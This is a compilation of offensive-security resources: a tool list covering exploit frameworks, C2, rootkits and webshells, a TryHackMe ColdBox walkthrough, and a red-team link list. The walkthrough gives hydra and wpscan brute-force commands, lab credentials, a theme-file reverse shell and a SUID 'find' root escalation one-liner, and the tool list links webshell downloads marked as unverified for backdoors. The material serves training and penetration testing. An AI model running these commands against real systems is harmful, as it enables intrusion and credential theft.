Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. * [HackBrowserDat](https://github.com/moonD4rk/HackBrowserData) - Decrypt passwords/cookies/history/bookmarks from the browser * [John](https://github.com/openwall/john) - John the Ripper jumbo - advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs. ### Wireless Attacks #### Wireless Tools * [Fern Wifi cracker](https://github.com/savio-code/fern-wifi-cracker) - Fern-Wifi-Cracker is designed to be used in testing and discovering flaws in ones own network with the aim of fixing the flaws detected ### Reverse Engineering * [Ollydbg](http://www.ollydbg.de/) - OllyDbg is a 32-bit assembler level analysing debugger for Microsoft Windows ### Exploitation Tools #### Vulnerability Search * [SPLOITUS](https://sploitus.com) - Sploitus is а convenient central place for identifying the newest exploits and finding attacks that exploit known vulnerabilities * [SearchSploit](https://github.com/offensive-security/exploitdb) - The official Exploit Database repository * [Getsploit](https://github.com/vulnersCom/getsploit) - Command line utility for searching and downloading exploits * [Houndsploit](https://github.com/nicolas-carolo/houndsploit) - An advanced graphical search engine for Exploit-DB #### Cross-site Scripting(XSS) * [BeeF](https://github.com/beefproject/beef) - The Browser Exploitation Framework Project * [BlueLotus_XSSReceiver](https://github.com/firesunCN/BlueLotus_XSSReceiver) - XSS Receiver platform without SQL * [XSStrike](https://github.com/s0md3v/XSStrike) - Most advanced XSS scanner. * [xssor2](https://github.com/evilcos/xssor2) - XSS'OR - Hack with JavaScript. * [Xsser-Varbaek](https://github.com/Varbaek/xsser) - From XSS to RCE 2.75 - Black Hat Europe Arsenal 2017 + Extras * [Xsser-Epsylon](https://github.com/epsylon/xsser) - Cross Site "Scripter" (aka XSSer) is an automatic framework to detect, exploit and report XSS vulnerabilities in web-based applications. * [Xenotix](https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework) - An advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework #### Sql Injection * [Sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool * [SSQLInjection](https://github.com/shack2/SuperSQLInjectionV1) - SSQLInjection is a SQL injection tool , support Access/MySQL/SQLServer/Oracle/PostgreSQL/DB2/SQLite/Informix Database. * [Jsql-injection](https://github.com/ron190/jsql-injection) jSQL Injection is a Java application for automatic SQL database injection. * [NoSQLMap](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool. * [Sqlmate](https://github.com/s0md3v/sqlmate) - A friend of SQLmap which will do what you always expected from SQLmap * [SQLiScanner](https://github.com/0xbug/SQLiScanner) - Automatic SQL injection with Charles and sqlmap api * [sql-injection-payload-list](https://github.com/payloadbox/sql-injection-payload-list) - 🎯 SQL Injection Payload List * [Advanced-SQL-Injection-Cheatsheet](https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet) - A cheat sheet that contains advanced queries for SQL Injection of all types. #### Command Injection * [Commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool #### File Include * [LFIsuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner * [Kadimus](https://github.com/P0cL4bs/Kadimus) - Kadimus is a tool to check sites to lfi vulnerability , and also exploit it * [Shellfire](https://github.com/unix-ninja/shellfire) - Exploitation shell for exploiting LFI, RFI, and command injection vulnerabilities * [LFIter2](https://github.com/3mrgnc3/LFIter2) - LFIter2 Local File Include (LFI) Tool - Auto File Extractor & Username Bruteforcer * [FDsploit](https://github.com/chrispetrou/FDsploit) - File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool. #### File Upload vulnerability * [Fuxploider](https://github.com/almandin/fuxploider) - File upload vulnerability scanner and exploitation tool #### XML External Entity Attack(XXE) * [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods * [Oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes #### Cross-site request forgery (CSRF) * [Deemon](https://github.com/tgianko/deemon/) - Deemon is a tool to detect CSRF in web application #### Exploit Framework * [POC-T](https://github.com/Xyntax/POC-T) - Pentest Over Concurrent Toolkit * [Pocsuite](https://github.com/knownsec/Pocsuite) - Pocsuite is an open-sourced remote vulnerability testing framework developed by the Knownsec Security Team * [Metasploit](https://github.com/rapid7/metasploit-framework) - The world’s most used penetration testing framework * [Venom](https://github.com/r00t-3xp10it/venom) - Shellcode generator/compiler/handler (metasploit) * [Empire](https://github.com/EmpireProject/Empire) - Empire is a PowerShell and Python post-exploitation agent * [Koadic](https://github.com/zerosum0x0/koadic) - Koadic C3 COM Command & Control - JScript RAT * [Viper](https://github.com/FunnyWolf/Viper) - metasploit-framework UI manager Tools * [MSFvenom-gui](https://github.com/ssooking/msfvenom-gui) - gui tool to create normal payload by msfvenom #### Machine Learning * [DeepExploit](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/DeepExploit) - Fully automatic penetration test tool using Machine Learning * [GyoiThon](https://github.com/gyoisamurai/GyoiThon) - GyoiThon is a growing penetration test tool using Machine Learning * [Generator](https://github.com/13o-bbr-bbq/machine_learning_security/tree/master/Generator) - Fully automatically generate numerous injection codes for web application assessment #### Automate * [AutoSploit](https://github.com/NullArray/AutoSploit) - Automated Mass Exploiter * [WinPwn](https://github.com/SecureThisShit/WinPwn) - Automation for internal Windows Penetrationtest / AD-Security ### Sniffing & Spoofng * [WireShark](https://github.com/wireshark/wireshark) - Wireshark is a network traffic analyzer, or "sniffer", for Unix and Unix-like operating systems. * [Cain & able](http://www.oxid.it/cain.html) - Cain & Abel is a password recovery tool for Microsoft Operating Systems. ### Maintaining Access #### Shell * [Goshell](https://github.com/eze-kiel/goshell) - Generate reverse shells in command line with Go ! * [Print-My-Shell](https://github.com/sameera-madushan/Print-My-Shell) - Python script wrote to automate the process of generating various reverse shells. * [Girsh](https://github.com/nodauf/Girsh) - Automatically spawn a reverse shell fully interactive for Linux or Windows victim * [Blueshell](https://github.com/whitehatnote/BlueShell) - Generate a reverse shells for RedTeam * [Clink](http://mridgers.github.io/clink/) - Powerful Bash-style command line editing for cmd.exe * [Natpass](https://github.com/jkstack/natpass) - A new RAT Tools, Support Web VNC and Webshell #### Web Shell * Chopper > Tips: The tool comes from the network, no backdoor verification, please choose it on yourself...... > Link: https://pan.baidu.com/s/1VnXkoQU-srSllG6JaY0nTA Password: v71d * [AntSword](https://github.com/AntSwordProject/antSword) : [Document](https://doc.u0u.us/zh-hans/index.html) - AntSword is a cross-platform website management toolkit * [CKnife](https://github.com/Chora10/Cknife) - The cross platform webshell tool in java > Tips: The tool comes from the network, no backdoor verification, please choose it on yourself...... > Link: https://pan.baidu.com/s/1QZrnWU7DUuJhiXl7u1kELw Password: hjrh * [Behinder](https://github.com/rebeyond/Behinder) - dynamic binary encryption webshell management client * [Godzilla](https://github.com/BeichenDream/Godzilla) - a Java tool to encrypt network traffic * [Skyscorpion](https://github.com/shack2/skyscorpion) - Modified version of Behinder. * [PyShell](https://github.com/JoelGMSec/PyShell) - Multiplatform Python WebShell. * [Weevely3](https://github.com/epinna/weevely3) - Weaponized web shell * [Awsome-Webshells](https://github.com/abhinavprasad47/Awsome-Webshells) - Collection of reverse shells. #### Privilege Escalation Auxiliary * [windows-exploit-suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target * [Windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits) - windows-kernel-exploits * [linux-exploit-suggester-2](https://github.com/jondonas/linux-exploit-suggester-2) - Next-Generation Linux Kernel Exploit Suggester * [Linux-kernel-exploits](https://github.com/SecWiki/linux-kernel-exploits) - linux-kernel-exploits Linux * [BeRoot](https://github.com/AlessandroZ/BeRoot) - Privilege Escalation Project - Windows / Linux / Mac * [PE-Linux](https://github.com/WazeHell/PE-Linux) - Linux Privilege Escalation Tool By WazeHell * [Portia](https://github.com/SpiderLabs/portia) - Portia aims to automate a number of techniques commonly performed on internal network penetration tests after a low privileged account has been compromised. * [PEASS-ng](https://github.com/carlospolop/PEASS-ng) - PEASS - Privilege Escalation Awesome Scripts SUITE (with colors) * [GTFOBins](https://gtfobins.github.io/) - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. * [LOLBAS](https://lolbas-project.github.io/) - Living Off The Land Binaries, Scripts and Libraries. #### C2 * [DeimosC2](https://github.com/DeimosC2/DeimosC2) - DeimosC2 is a Golang command and control framework for post-exploitation. * [Sliver](https://github.com/BishopFox/sliver) - Implant framework * [PHPSploit](https://github.com/nil0x42/phpsploit) - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner 😈 * [Shad0w](https://github.com/bats3c/shad0w) - A post exploitation framework designed to operate covertly on heavily monitored environments (Win8、Win10) * [Covenant](https://github.com/cobbr/Covenant) - Covenant is a collaborative .NET C2 framework for red teamers. * [Emp3r0r](https://github.com/jm33-m0/emp3r0r) - linux post-exploitation framework made by linux user * [C3](https://github.com/FSecureLABS/C3) - Custom Command and Control (C3). A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits. ### Golang Sec Tools > Tips: Golang is a excellent cross platform language for security. * [Naabu](https://github.com/projectdiscovery/naabu) - A fast port scanner written in go with focus on reliability and simplicity. * [ServerScan](https://github.com/Adminisme/ServerScan) - A high concurrency network scanning and service detection tool developed by golang. ### Reporting & Collaboration * [Vulnreport](https://github.com/salesforce/vulnreport) - Open-source pentesting management and automation platform by Salesforce Product Security * [Pentest-Collaboration-Framework](https://gitlab.com/invuls/pentest-projects/pcf) - Opensource, cross-platform and portable toolkit for automating routine processes when carrying out various works for testing! * [CervantesSec](https://github.com/CervantesSec/cervantes) - Cervantes is an opensource collaborative platform for pentesters or red teams who want to save time to manage their projects, clients, vulnerabilities and reports in one place. ### Social Engineering Tools ### Code Audit * [Cloc](https://github.com/AlDanial/cloc) - cloc counts blank lines, comment lines, and physical lines of source code in many programming languages * [Cobra](https://github.com/WhaleShark-Team/cobra) - Source Code Security Audit * [Cobra-W](https://github.com/LoRexxar/Cobra-W) - Cobra for white hat * [Graudit](https://github.com/wireghoul/graudit) - Grep rough audit - source code auditing tool * [Rips](https://github.com/ripsscanner/rips) - A static source code analyser for vulnerabilities in PHP scripts ### Port Forwarding & Proxies * [EarthWorm](https://github.com/rootkiter/EarthWorm) - Tool for tunnel * [Termite](https://github.com/rootkiter/Termite/) - Tool for tunnel (Version 2) * [Frp](https://github.com/fatedier/frp) - A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet * [Nps](https://github.com/ehang-io/nps/) - A lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal. * [Goproxy](https://github.com/snail007/goproxy) - A high-performance, full-featured, cross platform proxy server * [ReGeorg](https://github.com/sensepost/reGeorg) - The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn * [Venom](https://github.com/Dliv3/Venom) - A Multi-hop Proxy for Penetration Testers * [Stowaway](https://github.com/ph4ntonn/Stowaway) - 👻 Stowaway -- Multi-hop Proxy Tool for pentesters * [rport](https://github.com/cloudradar-monitoring/rport) - Manage remote systems with ease. ### DevSecOps ### RootKit * [Beurk](https://github.com/unix-thrust/beurk) - BEURK Experimental Unix RootKit * [Bedevil](https://github.com/naworkcaj/bdvl) - LD_PRELOAD Linux rootkit (x86 & ARM) ### Audit Tools * [DevAudit](https://github.com/OSSIndex/DevAudit) - Open-source, cross-platform, multi-purpose security auditing tool ### Cyber Range #### Vulnerability application * [DVWA](https://github.com/ethicalhack3r/DVWA) - Damn Vulnerable Web Application (DVWA) * [WebGoat](https://github.com/WebGoat/WebGoat) - WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons * [DSVW](https://github.com/stamparm/DSVW) - DSVW is a deliberately vulnerable web application written in under 100 lines of code, created for educational purposes * [DVWS](https://github.com/snoopysecurity/dvws) - Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities * [XVWA](https://github.com/s4n7h0/xvwa) - XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security * [BWAPP](http://www.mmebvba.com/sites/bwapp/index.htm) - A buggy web application whit more than 100 vulnerabilities * [Sqli-lab](https://github.com/Audi-1/sqli-labs) - SQLI labs to test error based, Blind boolean based, Time based * [HackMe-SQL-Injection-Challenges](https://github.com/breakthenet/HackMe-SQL-Injection-Challenges) - Hack your friend's online MMORPG game - specific focus, sql injection opportunities * [XSS-labs](https://github.com/paralax/xss-labs) - Small set of scripts to practice exploit XSS and CSRF vulnerabilities * [SSRF-lab](https://github.com/m6a-UdS/ssrf-lab) - Lab for exploring SSRF vulnerabilities * [SSRF_Vulnerable_Lab](https://github.com/incredibleindishell/SSRF_Vulnerable_Lab) - This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack * [LFI-labs](https://github.com/paralax/lfi-labs) - Small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns * [Commix-testbed](https://github.com/commixproject/commix-testbed) - A collection of web pages, vulnerable to command injection flaws * [File-Upload-Lab](https://github.com/LunaM00n/File-Upload-Lab) - Damn Vulnerable File Upload V 1.1 * [Upload-labs](https://github.com/c0ny1/upload-labs) - A summary of all types of uploading vulnerabilities for you * [XXE-Lab](https://github.com/c0ny1/xxe-lab) - A XXE vulnerability Demo containing language versions such as PHP, Java, python, C#, etc #### Simulation Range * [Fopnp](https://github.com/brandon-rhodes/fopnp/tree/m/playground) - A Network Playground for 《Foundations of Python Network Programming》 * [CyberRange](https://github.com/secdevops-cuse/CyberRange) - The Open-Source AWS Cyber Range #### CTF challenges * [Vulnhub](https://www.vulnhub.com/) - VulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration * [TryHackMe](https://tryhackme.com/) - TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser! * [Hackthebox](https://www.hackthebox.com/) - Hack The Box is a massive, online cybersecurity training platform, allowing individuals, companies, universities and all kinds of organizations around the world to level up their hacking skills. * [Root Me](https://www.root-me.org/) - Root Me allows everyone to test and improve their knowledge in computer security and hacking.
# ColdBox Room [TryHackMe](https://tryhackme.com/room/colddboxeasy) --- ![Coldbox](./.assets/ColdboxEasy.png) --- ## Index - [Enumeration](#enumeration) - [Find vunerabilies](#finding-vunerabilies) - [Reverse shell](#gaining-a-reverse-shell) - [PrivEsc](#priviledge-escalation) --- ```bash $ export IP=10.10.94.215 ``` --- ### Enumeration ```bash $ nmap -sC -sV -v $IP -oN nmap/initial.nmap $ gobuster dir -t 64 -u $IP -w ~/wordlists/website_dir/directory-list-2.3-medium.txt -x .txt,.php,.html -o gobuster/dir_med_ini.txt ``` Ports: ``` 80 http 4512 ssh ``` Directories: ``` /wp-content /wp-admin.php /wp-login.php /hidden /xmlrpc.php ``` --- ### Finding vunerabilies Since this is a wordpress website, we can use `wpscan` to enumerate it easily and quickly ```bash $ wpscan --url $IP -e vp,vt,u ``` This yields multiple usernames we can leverage. They also correlate with names we found in `/hidden` Contructing the hydra command to brute force the users ```bash $ hydra -t 64 -V -L users.txt -P ~/wordlists/passwords/rockyou.txt $IP http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:incorrect" ``` Also, worthy to note wpscan's bruteforcer which seems as faster (if not faster) than hydra at full sprint ```bash $ wpscan --url $IP -U users.txt -P ~/wordlists/passwords/rockyou.txt ``` And you don't even need to tinker with the request format, making it much nicer to work with than hydra. Once that is done (takes a while unfortunately) we gain the credentials: `c0ldd:9876543210` --- ### Gaining a reverse shell Once we're in, I notice our ability to edit theme files. Meaning that we can create a php reverse shell by modifying one of the php scripts with our reverse shell code. I chose `404.php` in the twentyfifteen theme and navigated to `http://$IP/wp-content/themes/twentyfifteen/404.php` and voila! Our reverse shell is active. --- ### Priviledge Escalation Now that we are logged on as `www-data` I navigate to `/tmp` and `wget` linpeas to begin enumerating the system. I quickly notice a strange plaintext linpeas found in the wordpress config in regards to a database. It gave a username `c0ldd` and their password `cybersecurity` but before I decide to `su` into `c0ldd` I notice that `find` has its SUID bit set, enabling us to quickly escalate to root! Before I exploit find, I decide to check if `c0ldd`'s password really was cybersecurity. And it is! Moving onto `find` though, ```bash find . -exec /bin/bash -ip \; -quit ``` And we are now root! Note, that you can decode your user and root flags using b64 and google translating them from Spanish! (The room requires the encoded flags though) And we are _**complete!**_ Great practice for beginners like myself ![ice box](https://www.muralesyvinilos.com/murales/cubitos_de_hielo_muralesyvinilos_14152670__Monthly_XXL.jpg)
## Lists - https://github.com/D4nk0St0rM/ethical_hacker_lists #### Some Gems - https://github.com/jhaddix?tab=repositories #### Infrastructure - https://github.com/mantvydasb/Red-Team-Infrastructure-Automation #### Subdomains - https://github.com/nsonaniya2010/SubDomainizer - https://github.com/Cillian-Collins/subscraper - https://github.com/TheRook/subbrute.git - https://github.com/aboul3la/Sublist3r.git - https://github.com/projectdiscovery/subfinder - https://github.com/Findomain/Findomain - https://github.com/shmilylty/OneForAll - https://github.com/tomnomnom/assetfinder #### Recon - OSINT - Human Exploitation - Credentials - Weleakinfo - Dehashed - https://leakcheck.io/ - Haveibeenpwned - The Harvester - Search - https://intelx.io/tools - http://www.facesaerch.com/ - https://securitytrails.com/ - https://www.shodan.io/ - https://grayhatwarfare.com/ - https://hunter.io/ - https://www.voilanorbert.com/ - https://spydialer.com/ - https://www.searchmy.bio/ - https://snapmap.knightlab.com/#top - https://www.wolframalpha.com/input/?i=report - https://lucksi.github.io/Mr.Holmes/ #### SocEng - https://getgophish.com/ - https://www.maltego.com/ - https://le-tools.com/ - https://github.com/xHak9x/SocialPhish - https://github.com/mxrch/GHunt - https://commun.it/ - https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office - https://github.com/D4nk0St0rM/osint_stuff_tool_collection - https://www.spiderfoot.net/hx/ - http://geosocialfootprint.com/ - https://onemilliontweetmap.com/ - https://www.omnisci.com/demos/tweetmap - https://www.twiangulate.com/search/ - https://reddit-user-analyser.netlify.app/ - https://cse.google.com/cse?cx=006368593537057042503:efxu7xprihg#gsc.tab=0 - https://github.com/tejado/telegram-nearby-map - https://chrome.google.com/webstore/detail/findthatlead/lkpekgkhmldknbcgjicjkomphkhhdkjj?hl=en-GB - https://watools.io/ - https://github.com/tejado/telegram-nearby-map - https://github.com/ItIsMeCall911/Awesome-Telegram-OSINT - https://github.com/Malfrats/xeuledoc #### Recon - Other Intel - https://crt.sh/ - https://nitinpandey.in/ihunt/# - https://github.com/infosec-au/altdns - https://github.com/imthaghost/goclone - https://github.com/Josue87/gotator - https://github.com/infosec-au/altdns - https://github.com/blechschmidt/massdns - https://github.com/smicallef/spiderfoot - https://github.com/lanmaster53/recon-ng - https://spyse.com/ - https://github.com/jkakavas/creepy - https://github.com/khast3x/h8mail - https://github.com/tomnomnom/assetfinder - https://github.com/tomnomnom/waybackurls - https://github.com/Screetsec/Sudomy - https://github.com/m4ll0k/BBTz/blob/master/favihash.py - http://ptrarchive.com/ - https://github.com/OWASP/Amass - https://github.com/Tib3rius/AutoRecon #### With physical access - https://github.com/hak5darren/USB-Rubber-Ducky - https://blog.hartleybrody.com/rubber-ducky-guide/ - https://github.com/Screetsec/Pateensy #### Scanning, sniffing, automation - https://github.com/bettercap/bettercap - https://github.com/threat9/routersploit - https://github.com/nccgroup/autopwn - https://github.com/1N3/Sn1per - https://github.com/byt3bl33d3r/CrackMapExec - https://github.com/Cn33liz/p0wnedShell - https://github.com/archerysec/archerysec - https://github.com/vulnersCom/nmap-vulners - https://github.com/m4ll0k/AutoNSE - https://github.com/v3n0m-Scanner/V3n0M-Scanner - https://github.com/zdresearch/OWASP-Nettacker - https://github.com/rvrsh3ll/SharpSMBSpray #### Website clone - wget -mk -nH - https://github.com/imthaghost/goclone - https://github.com/trustedsec/social-engineer-toolkit #### Web App - https://github.com/OJ/gobuster.git - https://portswigger.net/burp - https://github.com/snoopysecurity/awesome-burp-extensions - https://github.com/wpscanteam/wpscan - https://github.com/s0md3v/XSStrike - https://github.com/OWASP/joomscan - nikto -h <URL> - whatweb -a 4 <URL> - wapiti -u <URL> - W3af - zaproxy - nuclei -t nuclei-templates - https://nmap.org/nsedoc/scripts/http-waf-detect.html - https://github.com/EnableSecurity/wafw00f - https://book.hacktricks.xyz/pentesting/pentesting-web/web-api-pentesting - https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d - Dirb - Dirbuster - Dirsearch - Gobuster - Feroxbuster - wfuzz - ffuf - https://www.ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground - https://github.com/swisskyrepo/PayloadsAllTheThings #### Network - nmap - https://github.com/21y4d/nmapAutomator.git - https://github.com/scipag/vulscan - https://github.com/robertdavidgraham/masscan - https://book.hacktricks.xyz/pentesting/pentesting-network#discovering-hosts-from-the-outside - https://github.com/vincentcox/bypass-firewalls-by-DNS-history - https://github.com/OWASP/Nettacker - https://blog.detectify.com/2019/07/31/bypassing-cloudflare-waf-with-the-origin-server-ip-address/ - https://github.com/gwen001/vhost-brute - https://pentest-tools.com/information-gathering/find-virtual-hosts #### WIFI Hacking - https://book.hacktricks.xyz/pentesting/pentesting-network/wifi-attacks #### PCAP search - https://github.com/lgandx/PCredz - https://github.com/DanMcInerney/net-creds - https://github.com/Srinivas11789/PcapXray #### Code and Cloud - https://searchcode.com/ - https://github.com/jordanpotti/CloudScraper - https://github.com/initstring/cloud_enum - https://github.com/projectdiscovery/cloudlist #### General - https://book.hacktricks.xyz/ - https://www.ired.team/ - https://github.com/mantvydasb/RedTeaming-Tactics-and-Techniques #### Exploit hosting - https://github.com/kgretzky/pwndrop - https://github.com/sc0tfree/updog #### Exploit / Priv Esc - https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git #### Bruteforce - https://github.com/x90skysn3k/brutespray - John - Hashcat - https://github.com/InfosecMatter/default-http-login-hunter #### Clone & Capture - SMS - RFID - https://scund00r.com/all/rfid/tutorial/2018/07/12/rfid-theif-v2.html - https://bishopfox.com/blog/tastic-rfid-thief-silent-deadly - https://hackaday.com/2013/11/03/rfid-reader-snoops-cards-from-3-feet-away/ #### Tunnels - https://github.com/sshuttle/sshuttle - https://github.com/jpillora/chisel - Proxychains - https://github.com/klsecservices/rpivot - https://github.com/D4nk0St0rM/pentesting_ethical_hacking/blob/main/method/pivoting/Pivots_SSH_Dynamic_Port_Forwarding.md - https://github.com/klsecservices/rpivot - https://github.com/sysdream/ligolo - https://github.com/blackarrowsec/pivotnacci #### Windows post-foothold - https://github.com/SnaffCon/Snaffler - Mimikatz - https://github.com/djhohnstein/SharpShares - https://github.com/0xthirteen/MoveKit - https://github.com/0xthirteen/SharpRDP - https://github.com/byt3bl33d3r/DeathStar - https://github.com/DanMcInerney/icebreaker - https://github.com/nettitude/Invoke-PowerThIEf - https://github.com/checkymander/Carbuncle - https://github.com/hlldz/pickl3 - https://github.com/shantanu561993/SharpLoginPrompt - https://github.com/BloodHoundAD/BloodHound - https://github.com/GhostPack/Seatbelt - https://github.com/mdsecactivebreach/Farmer #### Windows Priv Esc - https://github.com/itm4n/PrivescCheck - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS - https://github.com/AlessandroZ/BeRoot - https://github.com/rasta-mouse/Sherlock - https://github.com/hfiref0x/UACME - https://github.com/FatRodzianko/SharpBypassUAC - https://github.com/AzAgarampur/byeintegrity8-uac - https://github.com/rootm0s/WinPwnage - https://github.com/abatchy17/WindowsExploits - https://github.com/dafthack/HostRecon - https://github.com/sensepost/rattler - https://github.com/WindowsExploits/Exploits - https://github.com/Cybereason/siofra - https://github.com/0xbadjuju/Tokenvator - https://github.com/MojtabaTajik/Robber - https://github.com/411Hall/JAWS - https://github.com/GhostPack/SharpUp - https://github.com/GhostPack/Seatbelt - https://github.com/A-mIn3/WINspect - https://github.com/hausec/ADAPE-Script - https://github.com/SecWiki/windows-kernel-exploits - https://github.com/bitsadmin/wesng - https://github.com/itm4n/Perfusion - https://github.com/gtworek/Priv2Admin - https://github.com/itm4n/UsoDllLoader - https://github.com/TsukiCTF/Lovely-Potato - https://github.com/antonioCoco/RogueWinRM - https://github.com/antonioCoco/RoguePotato - https://github.com/itm4n/PrintSpoofer - https://github.com/BeichenDream/BadPotato - https://github.com/zcgonvh/EfsPotato - https://github.com/antonioCoco/RemotePotato0 - https://github.com/itm4n/FullPowers #### Linux Priv Esc - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS - https://github.com/mzet-/linux-exploit-suggester - https://github.com/rebootuser/LinEnum - https://github.com/diego-treitos/linux-smart-enumeration - https://github.com/CISOfy/lynis - https://github.com/AlessandroZ/BeRoot - https://github.com/future-architect/vuls - https://github.com/ngalongc/AutoLocalPrivilegeEscalation - https://github.com/b3rito/yodo - https://github.com/belane/linux-soft-exploit-suggester - https://github.com/sevagas/swap_digger - https://github.com/NullArray/RootHelper - https://github.com/NullArray/MIDA-Multitool - https://github.com/initstring/dirty_sock - https://github.com/jondonas/linux-exploit-suggester-2 - https://github.com/sosdave/KeyTabExtract - https://github.com/DominicBreuker/pspy - https://github.com/itsKindred/modDetective - https://github.com/nongiach/sudo_inject - https://github.com/Anon-Exploiter/SUID3NUM - https://github.com/nccgroup/GTFOBLookup - https://github.com/TH3xACE/SUDO_KILLER - https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py - https://github.com/inquisb/unix-privesc-check - https://github.com/hc0d3r/tas - https://github.com/SecWiki/linux-kernel-exploits - https://github.com/initstring/uptux - https://github.com/andrew-d/static-binaries - https://github.com/liamg/traitor #### Windows Credential Harvesting - https://github.com/gentilkiwi/mimikatz - https://github.com/GhostPack/SafetyKatz - https://github.com/Flangvik/BetterSafetyKatz - https://github.com/GhostPack/Rubeus - https://github.com/ShutdownRepo/targetedKerberoast - https://github.com/Arvanaghi/SessionGopher - https://github.com/peewpw/Invoke-WCMDump - https://github.com/tiagorlampert/sAINT - https://github.com/AlessandroZ/LaZagneForensic - https://github.com/eladshamir/Internal-Monologue - https://github.com/djhohnstein/SharpWeb - https://github.com/moonD4rk/HackBrowserData - https://github.com/mwrlabs/SharpClipHistory - https://github.com/0x09AL/RdpThief - https://github.com/chrismaddalena/SharpCloud - https://github.com/djhohnstein/SharpChromium - https://github.com/rxwx/chlonium - https://github.com/V1V1/SharpScribbles - https://github.com/securesean/DecryptAutoLogon - https://github.com/G0ldenGunSec/SharpSecDump - https://github.com/EncodeGroup/Gopher - https://github.com/GhostPack/SharpDPAPI - https://github.com/Hackndo/lsassy - https://github.com/aas-n/spraykatz - https://github.com/b4rtik/SharpKatz - https://github.com/login-securite/DonPAPI - https://github.com/Barbarisch/forkatz - https://github.com/skelsec/pypykatz #### Linux Credential Harvesting - https://github.com/huntergregal/mimipenguin - https://github.com/n1nj4sec/mimipy - https://github.com/dirtycow/dirtycow.github.io - https://github.com/mthbernardes/sshLooterC - https://github.com/blendin/3snake - https://github.com/0xmitsurugi/gimmecredz - https://github.com/TarlogicSecurity/tickey #### Password lists - Rockyou2021 - cewl - cupp - cupp guide - kwprocesser - bopscrk - mentalist - BEWGor - pydictor - g0tm1lk - FUZZING - SecLists - FUZZING - FuzzDB - DOMAIN - Easylist - DOMAIN - Fanboy/Adblock - DICTIONNARY - English Words - DICTIONNARY - Probable Wordlists - DICTIONNARY - Most common English words from Google sorted by frequency - DNS - Cisco Umbrella Top 1 million - DNS - Cisco Umbrella Top TLDs - DNS - Alexa Top 1 million - DOMAIN - FilterLists - PASSWORD - OpenWall - PASSWORD - CrackStation - PASSWORD - g0tmi1k's blog - PASSOWRD - Skull Security - WORDLIST - Hashcrack - WORDLIST - md5this - WORDLIST - Packet Storm - FIRST & LAST NAMES - philipperemy - WPA2-Wordlists - https://github.com/ihebski/DefaultCreds-cheat-sheet - https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv - https://www.cirt.net/passwords - https://many-passwords.github.io/ #### Fake upgrade - https://github.com/infobyte/evilgrade #### Binaries - https://github.com/andrew-d/static-binaries #### Bug bounty - https://github.com/arkadiyt/bounty-targets-data - https://github.com/PhotonBolt/chaospy #### Tools - https://etherpad.org/ - https://cryptpad.fr/drive/ - https://bin.privacytools.io/ - https://www.notion.so/ - https://privnote.com/ #### APIs - haveibeenpwned - fullcontact - Builtwith - Hashes.org - Hunter - Securitytrails - Shodan - Bing search - Google search - Leaklookup - EmailRep - scylla.sh - Zoopla - Companies house - wpvulndb - snusbase - Peoplemon - Dehashed - Shodan.io - Leaklookup - h8mail - discover - hunchley - burp - nmapAutomator #### OSINT - Recorded Future - Metagoofil - Google Dorks / The Google Hacking Database - OSINT Framework - Checkusernames - Security trails API - exiftool - Censys - Wappanalyzer - zoomeye - OpenVAS - Trace Labs OSINT VM Version 2 - Fierce - Foca - Unicornscan - IVRE - OWSAP AMASS - Email2phonenumber - GitGot - Karma #### Bug Bounty Platforms - [YesWeHack](https://yeswehack.com/) - [intigriti](https://intigriti.com/) - [HackerOne](https://hackerone.com/) - [Bugcrowd](https://bugcrowd.com/) - [Cobalt](https://cobalt.io/) - [Bountysource](https://www.bountysource.com/) - [Bounty Factory](https://bountyfactory.io/) - [Coder Bounty](http://www.coderbounty.com/) - [FreedomSponsors](https://freedomsponsors.org/) - [FOSS Factory](http://www.fossfactory.org/) - [Synack](https://www.synack.com/) - [HackenProof](https://hackenproof.com/) - [Detectify](https://cs.detectify.com/) - [Bugbountyjp](https://bugbounty.jp/) - [Safehats](https://safehats.com/) - [BugbountyHQ](https://www.bugbountyhq.com/) - 